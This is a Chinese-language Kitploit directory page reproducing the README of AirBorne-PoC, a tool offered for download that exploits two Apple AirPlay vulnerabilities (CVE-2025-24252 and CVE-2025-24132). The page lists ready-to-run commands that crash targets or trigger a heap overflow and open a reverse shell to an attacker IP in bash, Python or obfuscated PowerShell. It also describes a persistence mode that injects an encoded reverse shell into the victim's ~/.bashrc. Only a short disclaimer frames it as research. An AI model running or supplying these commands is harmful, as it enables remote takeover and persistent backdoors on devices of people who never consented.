Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
AirBorne-PoC — CVE-2025-24252 和 CVE-2025-24132 的 PoC | Kitploit
工具/GitHubGitHub/ekomssavior/airborne-poc
持久化机制漏洞分析漏洞利用Shellcode后渗透利用命令与控制远程访问工具Payload 开发二进制利用
GitHubekomssavior/airborne-poc

AirBorne-PoC

CVE-2025-24252 和 CVE-2025-24132 的 PoC

查看仓库
16427438个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

AirBorne PoC Framework – 精英 RCE 版

针对 CVE-2025-24252 与 CVE-2025-24132 的完整 PoC 框架
由 ekomsSavior 提供 |

AirBorne 是一个组合式概念验证(PoC)框架,针对 Apple AirPlay 服务中的两个严重漏洞。它包含完整的崩溃触发器和可用的反向 shell 漏洞利用,并可选持久化、监听器及多种 payload 格式——全部集成在一个脚本中。

想找原始版本?
旧版仍可在本仓库的 legacy 分支中找到。
查看方式:

root@kitploit:~
git checkout legacy

涵盖的 CVE

CVE-2025-24252 – mDNS TXT 记录崩溃

  • 通过畸形 mDNS 数据包触发 AirPlayReceiver 守护进程崩溃
  • 通过 5353 端口上的 UDP 广播工作

CVE-2025-24132 – 堆溢出 → 反向 Shell (RCE)

  • 在 AirPlay 的 7000 端口 TCP 服务中触发堆溢出
  • 支持 bash、python 和 PowerShell 反向 shell payload
  • 包含使用 .bashrc 注入的可选持久化(Linux)

快速开始

1. 克隆仓库

root@kitploit:~
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC

2. 安装依赖

root@kitploit:~
sudo apt update
sudo apt install -y python3-scapy netcat

运行流程

单个脚本 airborne.py 包含两个 PoC 及所有逻辑:

  • 使用 --exploit 选择 CVE
  • 使用 --payload 设置反向 shell payload
  • 自动为你启动一个 netcat 监听器
  • 可选地使用 --persistent 在目标上启用持久化

使用示例

使用 mDNS 数据包使目标崩溃 (CVE-2025-24252)

root@kitploit:~
sudo python3 airborne.py --exploit 24252 --interface wlan0

需要一个处于监听模式(monitor mode)的接口。


发起堆溢出 → RCE (CVE-2025-24132)

使用默认 bash shell 启动完整利用:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99

改用 Python shell:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python

在 Linux 目标上启用真正的持久化:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent

仅 shell 命令注入

root@kitploit:~
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"

Payload 选项

PayloadDescription
bash默认基于 TCP 的 bash 反向 shell
python基于 Python 的反向 shell,使用 socket 和 pty
powershell完整的 Windows PowerShell RCE payload(混淆)

持久化模式

使用 --persistent 时,脚本会将编码后的反向 shell payload 追加到目标的:

root@kitploit:~
~/.bashrc

这确保每次用户登录或生成终端时,你都会获得一个 shell。


维护说明

  • 反向 shell 使用 base64 编码,并在缓冲区溢出后发送
  • 所有 payload 都通过 7000 端口发送
  • mDNS 数据包通过 UDP 5353 发送,需要原始套接字权限
  • 确保目标设备可以访问你的攻击机 IP
  • 脚本处理基本错误情况,若端口关闭则静默失败

道德免责声明

本项目仅用于教育、道德和授权研究目的。

  • 你必须获得明确许可才能测试目标系统。
  • 你将对所采取的任何行为承担全部责任。

未经授权利用系统是非法且不道德的。


致谢

  • 由 ekomsSavior 构建
  • 灵感来自真实世界的 CVE 和漏洞利用开发研究
下载工具